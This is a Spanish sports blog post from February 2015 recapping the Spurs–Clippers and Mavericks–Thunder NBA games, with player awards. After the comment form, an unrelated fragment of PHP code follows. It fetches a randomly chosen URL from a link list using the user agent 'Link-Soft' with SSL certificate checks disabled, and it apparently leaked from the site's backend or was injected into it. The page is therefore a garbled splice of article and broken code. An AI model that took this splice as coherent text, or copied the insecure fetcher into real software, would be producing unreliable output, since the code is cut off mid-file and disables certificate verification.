La crónica: Tras la tempestad ¿la calma?

20 de February de 2015 por MagicJohnson32

Esta pasada madrugada, de manera casi disimulada en medio de la polvareda levantada por todos los movimientos del trade deadline, se ha reanudado la competición tras el parón del All Star. Lo ha hecho con dos partidos estupendos, tanto a priori como luego han resultado sobre el parquet. Los resumimos.

San Antonio Spurs 115 – L.A. Clippers 119

Dos de los pocos equipos que no realizaron ningún movimiento en el cierre del mercado se enfrentaron anoche en el Staples. Los Spurs tenían la oportunidad de superar a los Clippers en la clasificación y abandonar esa séptima plaza que vienen ocupando desde hace ya unas semanas. Poco les faltó. En un partido marcado por el insistente hack al que los Spurs sometieron a DeAndre Jordan (10 de 28 en tiros libres firmó el pívot), los Clippers acabaron imponiéndose por la aparición de Jamal Crawford con ocho puntos casi consecutivos decisivos para contener a un Tim Duncan una vez más rejuvenecido. Hasta entonces habían sido Chris Paul y DeAndre Jordan, pese a sus problemas desde la línea de TL, los que habían mantenido a los Clippers en el partido. Con la de anoche, los Clippers encadenan tres victorias consecutivas sin Blake Griffin, se sitúan quintos y alejan fastasmas de cara a su clasificación para los Playoffs. 

Dallas Mavericks 89 – Oklahoma City Thunder 104

Los Mavs sin Amare pero con Chandler y Rondo de vuelta; los Thunder sin los traspasados Jackson y Perkins, ni el lesionado Adams, ni (obviamente) sus más recientes incorporaciones, Kanter & Co. Además, con Kevin Durant todavía renqueante de unos problemas en el pie que tienen pinta de que le afectarán lo que queda de temporada. A Russell Westbrook le da igual. El MVP del All Star Game 2015 mantuvo el pie en el acelerador, que es la única manera en la que sabe jugar, y pasó por encima de los Mavs para poner, al fin, a los Thunder en posiciones de Playoffs. La labor de Westbrook en ataque la completó Ibaka, excelente, y la defensa de OKC hizo el resto. Los Mavs sufrieron para anotar, especialmente en la primera mitad (anotaron un 29% de sus tiros en ese tiempo), y se vieron obligados a remar todo el partido. Cuando lograron recortar la diferencia a 10 puntos, ya en el último cuarto, Westbrook apareció para rematarlos.

PREMIOS

MVP: Ya lo decíamos en la crónica. A Russell Westbrook le da igual quién falte, quién llegue, quién se marche, quién esté lesionado… Él, a lo suyo. Sus 34 puntos y 10 asistencias pusieron en órbita a los Thunder.

Sorpresa: No está resultando el mejor año de Serge Ibaka pero ayer dio toda una lección defensiva. Acabó con 22 rebotes nada menos, pero es que además anotó 21 puntos.

Decepción: Kawhi Leonard acabó con 1 de 11 en TC. Es su peor porcentaje en un partido en el que tira más de 10 veces.

Esfuerzo en vano: ¿Cuántos años decís que tiene Tim Duncan? ¿38? Pues ayer parecía que tuviera 25. 30 puntos y 11 rebotes ante uno de los mejores pívots defensivos del campeonato como es DeAndre Jordan y aún se permitió el lujo de colgarse del aro a pesar de su oposición. De todas maneras, los Spurs acabaron cayendo.

TOP-5

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>